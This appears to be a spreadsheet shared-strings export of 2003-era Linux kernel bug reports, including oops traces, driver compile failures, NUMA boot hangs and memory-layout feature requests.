  <si>
    <t>2004-12-02 11:21 UTC</t>
  </si>
  <si>
    <t>Bill Hartner</t>
  </si>
  <si>
    <t>Red Hat Linux Advanced Server 2.1 provides an adjustable parameter /proc/&lt;pid&gt;/mapped_base to allow more user address space per process. Effectively, it configures TASK_UNMAPPED_BASE. We would like to have this feature or a similar one included in 2.5/2.6 kernels. Martin Bligh is currently working on it. Regards, Peter Wong, IBM LTC Performance Team</t>
  </si>
  <si>
    <t>Configuring PAGE_OFFSET</t>
  </si>
  <si>
    <t>2003-04-23 15:58 UTC</t>
  </si>
  <si>
    <t>2003-12-24 17:33 UTC</t>
  </si>
  <si>
    <t>Dave Hansen has provided a patch to split the user space and kernel space in different ways: 3.5/0.5, 1/3, 2/2, 3/1. However, there are situations that collisions of memory allocation occur based upon the computed TASK_UNMAPPED_BASE. We need to hand code TASK_UNMAPPED_BASE to run the application. Perhaps, Bug 628 (configuring TASK_UNMAPPED_BASE) should work with this one. Regards, Peter Wong, IBM LTC Performance Team</t>
  </si>
  <si>
    <t>can't boot kernel with mem=1/2 memory on multinode x440 with numa enabled</t>
  </si>
  <si>
    <t>NUMA/discontigmem</t>
  </si>
  <si>
    <t>2003-04-24 08:24 UTC</t>
  </si>
  <si>
    <t>2003-06-17 15:03 UTC</t>
  </si>
  <si>
    <t>Distribution: N/A Hardware Environment: x440, 8 x 1.6 Xeon, 16 GB Software Environment: 2.5.68 NUMA enabled kernel Problem Description: Kernel boot gets stuck at "OK, booting kernel" when using mem= to specify half of the memory (mem=8000M or mem=8346278k) boot param. Specifying all the memory with mem= seems to work. Disabling NUMA support in the kernel and specifying mem=1/2 the memory also works. I suspect this is a problem with the discontig/node local support. Martin, if you get this bug, this is on elm3a2 system, which you should have access to. kernels are /boot/bzImage-2.5.68[-nonuma] and kernel source is in /home/andrewt/linux-2.5.68.</t>
  </si>
  <si>
    <t>Removal of USB flash drive causes oops in khupd</t>
  </si>
  <si>
    <t>2003-04-24 12:09 UTC</t>
  </si>
  <si>
    <t>Christopher Swingley</t>
  </si>
  <si>
    <t>2003-06-05 12:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux unstable (sid) Hardware Environment: k7 desktop and PIII laptop Software Environment: X, console mode Problem Description: Unplugging USB flash drive causes oops in khupd, USB support lost after oops Steps to reproduce: Insert a USB flash drive (type doesn't seem to matter, but I can give model info for the three drives I've tried if you want). Mount device. Umount device. Remove USB device from socket -- oops as follows: ##### usb 1-1: USB disconnect, address 3 Unable to handle kernel NULL pointer dereference at virtual address 00000001 printing eip: c01badd3 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[proc_match+19/64] Not tainted EFLAGS: 00010286 EIP is at proc_match+0x13/0x40 eax: ffffffff ebx: c1bcd85c ecx: ffffffff edx: c11efdc8 esi: c11efdc8 edi: c1bcd88c ebp: c11efd8c esp: c11efd84 ds: 007b es: 007b ss: 0068 Process khubd (pid: 4, threadinfo=c11ee000 task=c114d320) Stack: 00000001 c1bcd88c c11efdb4 c01bc3d2 00000001 c11efdc8 ffffffff c11efdb4 c11efdc8 c7e725e0 c11efdc8 c7e721b0 c11efde0 c0337bc2 c11efdc8 c1bcd85c 00000000 c7b20030 c7e721b0 c11efe58 c7e725e0 c7e725e0 c7b20200 c11efe58 Call Trace: [remove_proc_entry+82/288] remove_proc_entry+0x52/0x120 [scsi_proc_host_rm+66/112] scsi_proc_host_rm+0x42/0x70 [scsi_unregister+253/576] scsi_unregister+0xfd/0x240 [scsi_remove_device+64/80] scsi_remove_device+0x40/0x50 [scsi_remove_device+64/80] scsi_remove_device+0x40/0x50 [storage_disconnect+429/785] storage_disconnect+0x1ad/0x311 [iput+99/144] iput+0x63/0x90 [storage_disconnect+0/785] storage_disconnect+0x0/0x311 [usb_device_remove+156/160] usb_device_remove+0x9c/0xa0 [device_release_driver+102/112] device_release_driver+0x66/0x70 [bus_remove_device+127/208] bus_remove_device+0x7f/0xd0 [device_del+108/176] device_del+0x6c/0xb0 [device_unregister+20/34] device_unregister+0x14/0x22 [usb_disconnect+199/352] usb_disconnect+0xc7/0x160 [usb_hub_port_connect_change+831/848] usb_hub_port_connect_change+0x33f/0x350 [usb_hub_port_status+104/176] usb_hub_port_status+0x68/0xb0 [usb_hub_events+1014/1392] usb_hub_events+0x3f6/0x570 [allow_signal+204/512] allow_signal+0xcc/0x200 [usb_hub_thread+53/240] usb_hub_thread+0x35/0xf0 [default_wake_function+0/32] default_wake_function+0x0/0x20 [usb_hub_thread+0/240] usb_hub_thread+0x0/0xf0 [kernel_thread_helper+5/24] kernel_thread_helper+0x5/0x18 Code: 0f b7 48 02 3b 4d 08 74 14 31 c0 8b 34 24 8b 7c 24 04 89 ec &lt;3&gt;drivers/usb/host/uhci-hcd.c: 1060: host controller halted. very bad #####</t>
  </si>
  <si>
    <t>xirc2ps_cs hangs on shutdown</t>
  </si>
  <si>
    <t>2.5.68-bk</t>
  </si>
  <si>
    <t>2003-04-24 14:53 UTC</t>
  </si>
  <si>
    <t>Daniel Ritz</t>
  </si>
  <si>
    <t>2003-06-22 13:32 UTC</t>
  </si>
  <si>
    <t>Distribution: Conectiva Linux 8 Hardware Environment: toshiba tecra 8000 Software Environment: Problem Description: from syslog (during normal run): Apr 23 22:10:28 cast2 kernel: irq event 3: bogus retval mask 4 Apr 23 22:10:30 cast2 last message repeated 99 times (irg 3 is where the xir2pc_cs lives on) and then on shutdown: Apr 24 00:08:54 cast2 kernel: unregister_netdevice: waiting for eth0 to become free. Usage count = 2 Apr 24 00:09:25 cast2 last message repeated 3 times ...and then use the reset button because the only thing it does is to repeat these messages. also that part of the driver looks not so good to me: static void busy_loop(u_long len) { if (in_interrupt()) { u_long timeout = jiffies + len; u_long flags; save_flags(flags); sti(); while (time_before_eq(jiffies, timeout)) ; restore_flags(flags); } else { __set_current_state(TASK_UNINTERRUPTIBLE); schedule_timeout(len); } } Steps to reproduce: - load xirc2ps_cs module - do some network activity - shutdown the box</t>
  </si>
  <si>
    <t>kernel BUG at ipc/sem.c:1118</t>
  </si>
  <si>
    <t>Linux-2.5.66</t>
  </si>
  <si>
    <t>2003-04-24 15:15 UTC</t>
  </si>
  <si>
    <t>2003-05-31 16:00 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.0 Hardware Environment: 4-way PIII 700, 4GB ram Software Environment: LTP - current cvs copy Problem Description: After running LTP for about 12 days with -x3 on this 4-way, I get the following: kernel BUG at ipc/sem.c:1118! invalid operand: 0000 [#1] CPU: 1 EIP: 0060:[&lt;c020334e&gt;] Not tainted EFLAGS: 00010282 EIP is at sys_semtimedop+0x542/0x6b0 eax: 00000000 ebx: cbf32000 ecx: c0559ea0 edx: 00000008 esi: 00000000 edi: cbf32000 ebp: cbf33f80 esp: cbf33d9c ds: 007b es: 007b ss: 0068 Process semctl01 (pid 11146, threadinfo=cbf32000 task=f6bc5360) Stack: bffff2dc 00000001 00000000 cbf33e00 0000000a cbf33e06 00000000 00000000 00000000 00000000 cbf33e00 00000000 6b6b6b6b 6b6b6b6b ebd17dd4 00000000 f6bc5360 00000000 00002b8a ffffffd5 f7d613e4 10830008 cbf33e00 00000001 Call Trace: [&lt;c0138fe3&gt;] buffered_rmqueue+0x15b/0x168 [&lt;c0149888&gt;] page_remove_rmap+0x14/0x258 [&lt;c0144299&gt;] do_wp_page+0x14/0x258 [&lt;c01453f8&gt;] handle_mm_fault+0x16c/0x210 [&lt;c01170ab&gt;] do_page_fault+0x13b/0x478 [&lt;c0116f70&gt;] do_page_fault+0x0/0x478 [&lt;c010fab0&gt;] sys_ipc+0x40/0x1d4 [&lt;c0109c9d&gt;] error_code+0x2d/0x38 [&lt;c0109213&gt;] syscall_call+0x7/0xb Code: 0f 0b 5e 04 93 99 3d c0 b8 00 e0 ff ff 21 e0 8b 00 c7 80 1c Steps to reproduce: I've seen this bug several times before, but have never managed to get a full dump of the output. The machine did not hang, but the LTP run stopped on that console, and I could not break out of it. Switched to a different console and I was able to work. This has been very difficult to reproduce.</t>
  </si>
  <si>
    <t>oops bad scheduling while atomic</t>
  </si>
  <si>
    <t>2003-04-24 19:28 UTC</t>
  </si>
  <si>
    <t>Michael Purcaro</t>
  </si>
  <si>
    <t>2003-10-06 21:10 UTC</t>
  </si>
  <si>
    <t>Distribution: I was just doing a compile of gcc 3.2.3 and got the following oops at some point during the compile (not exactly sure where -- I killed the job and then later checked dmesg). Hardware Environment: AMD Duron 900 VIA VT8363/8365 VT82C586B PIPC Bus Master IDE Software Environment: RedHat 7.3 Rusty's modutils Problem Description: oops below (when restarting, I also noticed /dev/hda2 had been umounted...) Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c0164125 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c0164125&gt;] Not tainted EFLAGS: 00010286 EIP is at find_inode_fast+0x15/0x40 eax: c43eb444 ebx: dfd3e800 ecx: 00004216 edx: 00000000 esi: dfd3e800 edi: 00004216 ebp: dfd3e800 esp: d55a5e34 ds: 007b es: 007b ss: 0068 Process find (pid: 23535, threadinfo=d55a4000 task=ce69e740) Stack: d55a4000 c01647b0 dfd3e800 c15262d4 00004216 c15262d4 00004216 dfd3e800 c9faa8c0 c9faa8c0 c0185b64 dfd3e800 00004216 d9bb1034 fffffff4 cb72e82c cb72e7c4 c0158920 cb72e7c4 c9faa8c0 00000000 d55a5f48 dffea780 d55a5ef4 Call Trace: [&lt;c01647b0&gt;] iget_locked+0x50/0xc0 [&lt;c0185b64&gt;] ext3_lookup+0x84/0x160 [&lt;c0158920&gt;] real_lookup+0xc0/0xf0 [&lt;c0158c1e&gt;] do_lookup+0x9e/0xb0 [&lt;c01590b9&gt;] link_path_walk+0x489/0x8d0 [&lt;c0159979&gt;] __user_walk+0x49/0x60 [&lt;c0154c1c&gt;] vfs_lstat+0x1c/0x60 [&lt;c01552ab&gt;] sys_lstat64+0x1b/0x40 [&lt;c010abf7&gt;] syscall_call+0x7/0xb Code: 0f 0d 02 39 48 18 74 0a 85 d2 89 d0 75 f0 31 c0 5b c3 39 98 &lt;6&gt;note: find[23535] exited with preempt_count 2 bad: scheduling while atomic! Call Trace: [&lt;c0118e55&gt;] schedule+0x395/0x3a0 [&lt;c013d633&gt;] unmap_page_range+0x43/0x70 [&lt;c013d820&gt;] unmap_vmas+0x1c0/0x220 [&lt;c014158b&gt;] exit_mmap+0x7b/0x190 [&lt;c011a744&gt;] mmput+0x54/0xb0 [&lt;c011e2e9&gt;] do_exit+0x119/0x370 [&lt;c010b3f1&gt;] die+0xe1/0xf0 [&lt;c01174ea&gt;] do_page_fault+0x14a/0x457 [&lt;c014eadb&gt;] __getblk+0x2b/0x60 [&lt;c01818c9&gt;] ext3_getblk+0x99/0x2b0 [&lt;c011a480&gt;] autoremove_wake_function+0x0/0x50 [&lt;c014d4ef&gt;] wake_up_buffer+0xf/0x30 [&lt;c014d543&gt;] unlock_buffer+0x33/0x60 [&lt;c0150ad5&gt;] ll_rw_block+0x45/0x80 [&lt;c01857d0&gt;] ext3_find_entry+0x330/0x410 [&lt;c01173a0&gt;] do_page_fault+0x0/0x457 [&lt;c010ada1&gt;] error_code+0x2d/0x38 [&lt;c0164125&gt;] find_inode_fast+0x15/0x40 [&lt;c01647b0&gt;] iget_locked+0x50/0xc0 [&lt;c0185b64&gt;] ext3_lookup+0x84/0x160 [&lt;c0158920&gt;] real_lookup+0xc0/0xf0 [&lt;c0158c1e&gt;] do_lookup+0x9e/0xb0 [&lt;c01590b9&gt;] link_path_walk+0x489/0x8d0 [&lt;c0159979&gt;] __user_walk+0x49/0x60 [&lt;c0154c1c&gt;] vfs_lstat+0x1c/0x60 [&lt;c01552ab&gt;] sys_lstat64+0x1b/0x40 [&lt;c010abf7&gt;] syscall_call+0x7/0xb Steps to reproduce: not sure -- was doing a compile test of gcc 3.2.3</t>
  </si>
  <si>
    <t>feature request for node-local memory allocation support for hugetlbfs</t>
  </si>
  <si>
    <t>2003-04-25 14:47 UTC</t>
  </si>
  <si>
    <t>2003-07-02 11:15 UTC</t>
  </si>
  <si>
    <t>Bill Irwin has provided a large page support patch; however, it is not NUMA- aware. Bill will provide a NUMA-aware patch later. I want to assign it to Bill Irwin. However, Bugme rejected willir@us.ibm.com as his email (or account). Please assign it on my behalf. Thanks. Peter Wong IBM LTC Performance Team</t>
  </si>
  <si>
    <t>2.5.68-mjb2 stops at activating swap</t>
  </si>
  <si>
    <t>2.5.68-mjb2</t>
  </si>
  <si>
    <t>2003-04-25 15:21 UTC</t>
  </si>
  <si>
    <t>2003-06-05 15:04 UTC</t>
  </si>
  <si>
    <t>Dave Hansen</t>
  </si>
  <si>
    <t>Distribution: RH 7.3 Hardware Environment: 8-way pIII-700 Software Environment: Problem Description: On boot, the boot stops progressing at "Activating swap" The machine is not completely hung (magic sysrq works) but is useless of course. I tried this with 2.5.68-vanilla and it does not have the same problem, but mjb1 and mjb2 do have the problem. Steps to reproduce: Here's what I suspect it is having problems with: (exerpt from /etc/fstab) /dev/sda5 swap swap defaults 0 0 /dev/sda6 swap swap defaults 0 0 /dev/sda7 swap swap defaults 0 0 /dev/sda8 swap swap defaults 0 0 /dev/sda9 swap swap defaults 0 0 /dev/sda10 swap swap defaults 0 0 /dev/sda11 swap swap defaults 0 0 /dev/sda12 swap swap defaults 0 0</t>
  </si>
  <si>
    <t>sleeping function called from illegal context</t>
  </si>
  <si>
    <t>2003-04-25 16:05 UTC</t>
  </si>
  <si>
    <t>Angus Sawyer</t>
  </si>
  <si>
    <t>2003-09-09 08:44 UTC</t>
  </si>
  <si>
    <t>Distribution: redhat 9 Hardware Environment: Athlon/ SoundBlaster Live Software Environment: alsa drivers/rosegarden Problem Description: Debug: sleeping function called from illegal context at include/asm/semaphore.h: 119 Call Trace: [&lt;c011dadf&gt;] __might_sleep+0x5f/0x80 [&lt;e325c3f6&gt;] +0x40a/0x574 [snd_emux_synth] [&lt;e3258b4a&gt;] lock_preset+0x1ca/0x290 [snd_emux_synth] [&lt;e325c3f6&gt;] +0x40a/0x574 [snd_emux_synth] [&lt;e325aaaf&gt;] snd_soundfont_search_zone+0x2f/0xf0 [snd_emux_synth] [&lt;e0911f10&gt;] snd_timer_s_function+0x0/0x20 [snd_timer] [&lt;e3256830&gt;] get_zone+0x70/0x90 [snd_emux_synth] [&lt;e3254632&gt;] snd_emux_note_on+0xf2/0x4a0 [snd_emux_synth] [&lt;c010c263&gt;] do_IRQ+0x233/0x370 [&lt;e325eec0&gt;] emux_ops+0x0/0x20 [snd_emux_synth] [&lt;e09090f6&gt;] +0xf6/0x3c0 [snd_seq_midi_emul] [&lt;c014b0eb&gt;] check_poison_obj+0x3b/0x190 [&lt;c02aefb4&gt;] kfree_skbmem+0x64/0x70 [&lt;e3257293&gt;] snd_emux_event_input+0x63/0xa0 [snd_emux_synth] [&lt;e325eec0&gt;] emux_ops+0x0/0x20 [snd_emux_synth] [&lt;e3241657&gt;] snd_seq_deliver_single_event+0x147/0x1b0 [snd_seq] [&lt;e3241965&gt;] snd_seq_deliver_event+0x45/0xb0 [snd_seq] [&lt;e3241a9a&gt;] snd_seq_dispatch_event+0xca/0x1b0 [snd_seq] [&lt;c011165a&gt;] do_gettimeofday+0x1a/0x90 [&lt;e3247335&gt;] snd_seq_check_queue+0x245/0x500 [snd_seq] [&lt;c016b19b&gt;] do_sync_read+0x8b/0xc0 [&lt;e09113fd&gt;] snd_timer_interrupt+0x48d/0x610 [snd_timer] [&lt;c02ab029&gt;] sock_poll+0x29/0x40 Steps to reproduce: play midi files using hardware synth</t>
  </si>
  <si>
    <t>testing email delivery</t>
  </si>
  <si>
    <t>2003-04-25 16:12 UTC</t>
  </si>
  <si>
    <t>Kees Cook</t>
  </si>
  <si>
    <t>2005-10-31 13:54 UTC</t>
  </si>
  <si>
    <t>Bug Me Administrator</t>
  </si>
  <si>
    <t>This is a test for bugzilla. Jon Tollefson has reported some email issues, and since the bugzilla instance just moved, I want to make sure email is working. I *did* get email for my new account, though...</t>
  </si>
  <si>
    <t>modprobe i810/i830 fails with "Cannot allocate memory"</t>
  </si>
  <si>
    <t>Video(DRI - non Intel)</t>
  </si>
  <si>
    <t>2003-04-28 07:20 UTC</t>
  </si>
  <si>
    <t>Stefano Rivoir</t>
  </si>
  <si>
    <t>2003-05-13 11:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: HP Omnibook XE3l Software Environment: Problem Description: Modules i810/i830 cannot be inserted (agpgart is already inserted) because modprobe fails with "Cannot allocate memory" Steps to reproduce: # modprope agpgart # modprobe i830</t>
  </si>
  <si>
    <t>sysfs initialisation failure.</t>
  </si>
  <si>
    <t>2003-04-30 09:23 UTC</t>
  </si>
  <si>
    <t>2004-11-30 15:05 UTC</t>
  </si>
  <si>
    <t>It's possible in some configurations that sysfs goes splat during initialisation. See oops attachment</t>
  </si>
  <si>
    <t>driver model needs easy way to create subdirs</t>
  </si>
  <si>
    <t>2003-04-30 15:05 UTC</t>
  </si>
  <si>
    <t>2007-03-12 08:36 UTC</t>
  </si>
  <si>
    <t>There needs to be a simple way to create subdirectories in the driver model for the sysfs trees, without having to dive down to raw kobjects.</t>
  </si>
  <si>
    <t>i386 NUMA does not work on non x440/Summit</t>
  </si>
  <si>
    <t>2003-05-01 07:06 UTC</t>
  </si>
  <si>
    <t>2003-10-30 10:35 UTC</t>
  </si>
  <si>
    <t>When a summit CONFIG_DISCONTIGMEM kernel is booted on a non summit/numa 4cpu box it'll not boot, hanging before console init Enabling early printk shows that it gets to the numa memory init and then dies with an endless "unknown interrupt" loop. Looks like the srat discontigmem init fallback path does not work. This is also a problem with the dynamic subarchitecture path (only in -mm) when CONFIG_NUMA is enabled. It disallows to build a generic generic CONFIG_NUMA kernel.</t>
  </si>
  <si>
    <t>Infrequent lockups on inbound connections</t>
  </si>
  <si>
    <t>2003-05-01 11:24 UTC</t>
  </si>
  <si>
    <t>Wessel Dankers</t>
  </si>
  <si>
    <t>2003-11-11 09:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable/experimental Hardware Environment: AMD Athlon XP1800+ stepping 02, VIA kt266a chipset, eepro100 Intel 82557/8/9 rev 08 (PCI ID 8086:1229) Software Environment: anything that does IPv6 TCP (http://fruit.eu.org/config-2.5.68) Problem Description: Every so often the kernel locks up during an inbound connection. Alt-sysrq-s doesn't work anymore, alt-sysrq-b does. Steps to reproduce: Create lots of inbound connections. Machine will hang sooner or later.</t>
  </si>
  <si>
    <t>2.5.73</t>
  </si>
  <si>
    <t>Yaron</t>
  </si>
  <si>
    <t>compile failure in drivers/video/aty/mach64_gx.c</t>
  </si>
  <si>
    <t>2.5.68-bk11</t>
  </si>
  <si>
    <t>2003-05-01 17:02 UTC</t>
  </si>
  <si>
    <t>2003-05-04 19:14 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc4 Hardware Environment: Abit KG7-RAID, AMD AthlonXP 2100+ Palomino Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,drivers/video/aty/.mach64_gx.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=mach64_gx -DKBUILD_MODNAME=atyfb -c -o drivers/video/aty/.tmp_mach64_gx.o drivers/video/aty/mach64_gx.c drivers/video/aty/mach64_gx.c:497: redefinition of `vclk_per' drivers/video/aty/mach64_gx.c:496: `vclk_per' previously declared here drivers/video/aty/mach64_gx.c: In function `aty_var_to_pll_1703': drivers/video/aty/mach64_gx.c:496: redeclaration of `vclk_per' drivers/video/aty/mach64_gx.c:497: `vclk_per' previously declared here drivers/video/aty/mach64_gx.c: At top level: drivers/video/aty/mach64_gx.c:602: warning: initialization from incompatible pointer type drivers/video/aty/mach64_gx.c:613: redefinition of `vclk_per' drivers/video/aty/mach64_gx.c:612: `vclk_per' previously declared here drivers/video/aty/mach64_gx.c: In function `aty_var_to_pll_8398': drivers/video/aty/mach64_gx.c:612: redeclaration of `vclk_per' drivers/video/aty/mach64_gx.c:613: `vclk_per' previously declared here drivers/video/aty/mach64_gx.c: At top level: drivers/video/aty/mach64_gx.c:726: warning: initialization from incompatible pointer type make[3]: *** [drivers/video/aty/mach64_gx.o] Error 1 make[2]: *** [drivers/video/aty] Error 2 make[1]: *** [drivers/video] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Graphics support ---&gt; [*] Mach64 GX support CONFIG_FB_ATY_GX=y</t>
  </si>
  <si>
    <t>compile failure in drivers/media/radio/miropcm20-rds.c</t>
  </si>
  <si>
    <t>2003-05-01 17:08 UTC</t>
  </si>
  <si>
    <t>2003-05-05 11:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc4 Hardware Environment: Abit KG7-RAID, AMD AthlonXP 2100+ Palomino Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,drivers/media/radio/.miropcm20-rds.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=miropcm20_rds -DKBUILD_MODNAME=miropcm20_rds -c -o drivers/media/radio/.tmp_miropcm20-rds.o drivers/media/radio/miropcm20-rds.c drivers/media/radio/miropcm20-rds.c:23: warning: `struct inode' declared inside parameter list drivers/media/radio/miropcm20-rds.c:23: warning: its scope is only this definition or declaration, which is probably not what you want drivers/media/radio/miropcm20-rds.c:38: warning: `struct inode' declared inside parameter list drivers/media/radio/miropcm20-rds.c:106: variable `rds_fops' has initializer but incomplete type drivers/media/radio/miropcm20-rds.c:107: unknown field `owner' specified in initializer drivers/media/radio/miropcm20-rds.c:107: warning: excess elements in struct initializer drivers/media/radio/miropcm20-rds.c:107: warning: (near initialization for `rds_fops') drivers/media/radio/miropcm20-rds.c:108: unknown field `read' specified in initializer drivers/media/radio/miropcm20-rds.c:108: warning: excess elements in struct initializer drivers/media/radio/miropcm20-rds.c:108: warning: (near initialization for `rds_fops') drivers/media/radio/miropcm20-rds.c:109: unknown field `open' specified in initializer drivers/media/radio/miropcm20-rds.c:109: warning: excess elements in struct initializer drivers/media/radio/miropcm20-rds.c:109: warning: (near initialization for `rds_fops') drivers/media/radio/miropcm20-rds.c:110: unknown field `release' specified in initializer drivers/media/radio/miropcm20-rds.c:111: warning: excess elements in struct initializer drivers/media/radio/miropcm20-rds.c:111: warning: (near initialization for `rds_fops') drivers/media/radio/miropcm20-rds.c:106: storage size of `rds_fops' isn't known make[3]: *** [drivers/media/radio/miropcm20-rds.o] Error 1 make[2]: *** [drivers/media/radio] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Radio Adapters ---&gt; &lt;*&gt; miroSOUND PCM20 radio RDS user interface (EXPERIMENTAL) CONFIG_RADIO_MIROPCM20_RDS=y</t>
  </si>
  <si>
    <t>compile failure in net/decnet/dn_route.c</t>
  </si>
  <si>
    <t>2003-05-01 17:15 UTC</t>
  </si>
  <si>
    <t>2003-05-04 21:50 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc4 Hardware Environment: Abit KG7-RAID, AMD AthlonXP 2100+ Palomino Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,net/decnet/.dn_route.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=dn_route -DKBUILD_MODNAME=decnet -c -o net/decnet/.tmp_dn_route.o net/decnet/dn_route.c net/decnet/dn_route.c: In function `dn_route_output_slow': net/decnet/dn_route.c:1058: `flp' undeclared (first use in this function) net/decnet/dn_route.c:1058: (Each undeclared identifier is reported only once net/decnet/dn_route.c:1058: for each function it appears in.) net/decnet/dn_route.c: In function `dn_route_input_slow': net/decnet/dn_route.c:1183: structure has no member named `fwmark' make[2]: *** [net/decnet/dn_route.o] Error 1 make[1]: *** [net/decnet] Error 2 make: *** [net] Error 2 Steps to reproduce: Networking support ---&gt; Networking options ---&gt; [*] DECnet: router support (EXPERIMENTAL) CONFIG_DECNET_ROUTER=y</t>
  </si>
  <si>
    <t>Badness in kobject_register at lib/kobject.c:288</t>
  </si>
  <si>
    <t>2003-05-04 07:44 UTC</t>
  </si>
  <si>
    <t>2003-06-18 07:22 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Hardware Environment: IBM thinkpad 600 Problem Description: Loading the ALSA drivers yields in dmesg: CS4236+ soundcard not found or device busy Badness in kobject_register at lib/kobject.c:288 Call Trace: [&lt;c6d1e27c&gt;] cs423x_pnpc_driver+0x5c/0xa0 [snd_cs4236] [&lt;c01eede8&gt;] kobject_register+0x58/0x70 [&lt;c6d1e26c&gt;] cs423x_pnpc_driver+0x4c/0xa0 [snd_cs4236] [&lt;c0226977&gt;] bus_add_driver+0x57/0xf0 [&lt;c6d1e26c&gt;] cs423x_pnpc_driver+0x4c/0xa0 [snd_cs4236] [&lt;c011b958&gt;] printk+0x118/0x180 [&lt;c6d1e23c&gt;] cs423x_pnpc_driver+0x1c/0xa0 [snd_cs4236] [&lt;c6d1e220&gt;] cs423x_pnpc_driver+0x0/0xa0 [snd_cs4236] [&lt;c0226e8a&gt;] driver_register+0x3a/0x40 [&lt;c6d1e250&gt;] cs423x_pnpc_driver+0x30/0xa0 [snd_cs4236] [&lt;c6d1e23c&gt;] cs423x_pnpc_driver+0x1c/0xa0 [snd_cs4236] [&lt;c6d1e220&gt;] cs423x_pnpc_driver+0x0/0xa0 [snd_cs4236] [&lt;c01faaf1&gt;] pnp_register_driver+0x41/0x70 [&lt;c6d1e250&gt;] cs423x_pnpc_driver+0x30/0xa0 [snd_cs4236] [&lt;c6d1c711&gt;] +0x62/0x71 [snd_cs4236] [&lt;c01fa676&gt;] pnp_register_card_driver+0x66/0xb0 [&lt;c6d1e23c&gt;] cs423x_pnpc_driver+0x1c/0xa0 [snd_cs4236] [&lt;c6d1e2c0&gt;] +0x0/0xe0 [snd_cs4236] [&lt;c6cde038&gt;] +0x38/0x82 [snd_cs4236] [&lt;c6d1e220&gt;] cs423x_pnpc_driver+0x0/0xa0 [snd_cs4236] [&lt;c01300b1&gt;] sys_init_module+0x131/0x210 [&lt;c6d1e2c0&gt;] +0x0/0xe0 [snd_cs4236] [&lt;c010944b&gt;] syscall_call+0x7/0xb CS4236+ soundcard not found or device busy Steps to reproduce: The config used is: root@gswi1164:/usr/src/linux-2.5.68# grep SND .config | grep "=" CONFIG_SND=m CONFIG_SND_SEQUENCER=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_VERBOSE_PRINTK=y CONFIG_SND_DEBUG=y CONFIG_SND_DEBUG_MEMORY=y CONFIG_SND_DEBUG_DETECT=y CONFIG_SND_MPU401=m CONFIG_SND_CS4232=m CONFIG_SND_CS4236=m Loading is with the debian scripts from testing (0.9.2-6)</t>
  </si>
  <si>
    <t>make modules causes an error in mwavedd.h.</t>
  </si>
  <si>
    <t>2003-05-04 23:03 UTC</t>
  </si>
  <si>
    <t>Mark Fairchild</t>
  </si>
  <si>
    <t>2003-07-03 05:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Redhat 9 Hardware Environment: Athlon 800 on a Gigabyte 7ZX 384 megs PC100 RAM Ensoniq 1371 sound card NV25 video card Software Environment: GCC gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) Using Kernel 2.4.20-9 Problem Description: Steps to reproduce: 1) Setup kernel 2.4.20-9 build environment. 2) execute "make oldconfig", using default options throughout. 3) execute "make bzImage" 4) execute "make modules" Make produces the following error message: gcc -Wp,-MD,drivers/char/mwave/.smapi.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -fomit-frame-pointer -nostdinc -iwithprefix include -DMODULE -DMW_TRACE -DKBUILD_BASENAME=smapi -DKBUILD_MODNAME=mwave -c -o drivers/char/mwave/.tmp_smapi.o drivers/char/mwave/smapi.c In file included from drivers/char/mwave/smapi.c:53: drivers/char/mwave/mwavedd.h:129: parse error before "wait_queue_head_t" drivers/char/mwave/mwavedd.h:129: warning: no semicolon at end of struct or union drivers/char/mwave/mwavedd.h:130: warning: type defaults to `int' in declaration of `MWAVE_IPC' drivers/char/mwave/mwavedd.h:130: warning: data definition has no type or storage class drivers/char/mwave/mwavedd.h:140: parse error before "MWAVE_IPC" drivers/char/mwave/mwavedd.h:140: warning: no semicolon at end of struct or union drivers/char/mwave/mwavedd.h:146: parse error before '}' token drivers/char/mwave/mwavedd.h:146: warning: type defaults to `int' in declaration of `MWAVE_DEVICE_DATA' drivers/char/mwave/mwavedd.h:146: warning: type defaults to `int' in declaration of `pMWAVE_DEVICE_DATA' drivers/char/mwave/mwavedd.h:146: warning: data definition has no type or storage class make[3]: *** [drivers/char/mwave/smapi.o] Error 1 Incidentally, this is my first ever bug report regarding the Kernel -- I have never built the kernel from a non-distribution supplied source. Hopefully I haven't just bothered everyone!</t>
